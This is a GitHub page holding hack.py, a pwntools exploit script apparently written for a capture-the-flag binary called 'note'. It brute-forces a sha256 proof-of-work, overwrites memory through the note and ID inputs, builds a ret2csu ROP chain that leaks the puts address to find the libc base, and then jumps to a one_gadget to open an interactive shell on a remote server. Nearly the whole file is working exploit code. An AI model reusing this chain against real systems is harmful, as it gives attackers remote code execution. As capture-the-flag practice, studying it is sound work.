-
Notifications
You must be signed in to change notification settings - Fork 26
/
hack.py
executable file
·92 lines (78 loc) · 1.94 KB
/
hack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © 2018 hzshang <[email protected]>
from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
import string
from hashlib import sha256
context.log_level="debug"
pwn_file="./note"
elf=ELF(pwn_file)
libc=ELF("./libc.so.6")
libc_add=0
pid=0
if len(sys.argv)==1:
conn=process(pwn_file)
pid=conn.pid
else:
conn=remote("47.89.18.224",10007)
def brute_force(prefix,s):
return bruteforce(lambda x:sha256(x+prefix).hexdigest()==s,string.ascii_letters+string.digits,length=4)
data=conn.recvline(keepends=False)
prefix,s=parse("sha256(xxxx+{}) == {}",data)
conn.sendline(brute_force(prefix,s))
pid=0
def debug():
log.debug("libc address:0x%x"%libc_add)
log.debug("process pid:%d"%pid)
pause()
def edit(s):
conn.sendlineafter("> ","1")
conn.sendlineafter("Note:",s)
def show():
conn.sendlineafter("> ","2")
conn.recvuntil("Note:")
return conn.recvline(keepends=False)
def save():
conn.sendlineafter("> ","3")
conn.recvuntil("Saved!\n");
def changeID(s):
conn.sendlineafter("> ","4")
conn.sendlineafter("Input your ID:",s)
def exit():
conn.sendlineafter("> ","5")
ID={
0:"a\x00",
0xc0:"%s\x00",
}
conn.sendlineafter("Input your ID:",fit(ID,filler="a"))
f={
0xa8:p64(0x602100),
}
edit(fit(f,length=0x100))
rop="a"*0x64
rop+=p64(0x0400FFA)# ret to csu : leak libc
rop+=p64(0)# rbx
rop+=p64(1)# rbp
rop+=p64(elf.got["puts"])#r12
rop+=p64(0)# r13
rop+=p64(0)# r14
rop+=p64(elf.got["puts"])# r15
rop+=p64(0x400FE0)
rop+=p64(0)
rop+=p64(0)
rop+=p64(0)# rbx
rop+=p64(0)
rop+=p64(0)
rop+=p64(0)
rop+=p64(0)
rop+=p64(0x400e3f)# jmp to _start
rop+=","
conn.sendlineafter("> ",rop)
libc_add=u64(conn.recvline().ljust(8,"\x00"))-libc.symbols["puts"]
conn.sendlineafter("Input your ID:","a")
edit(fit(f,length=0x100))
conn.sendlineafter("> ","a"*0x64+p64(libc_add+0x4526a)+"\x00"*0x40+",")
conn.interactive()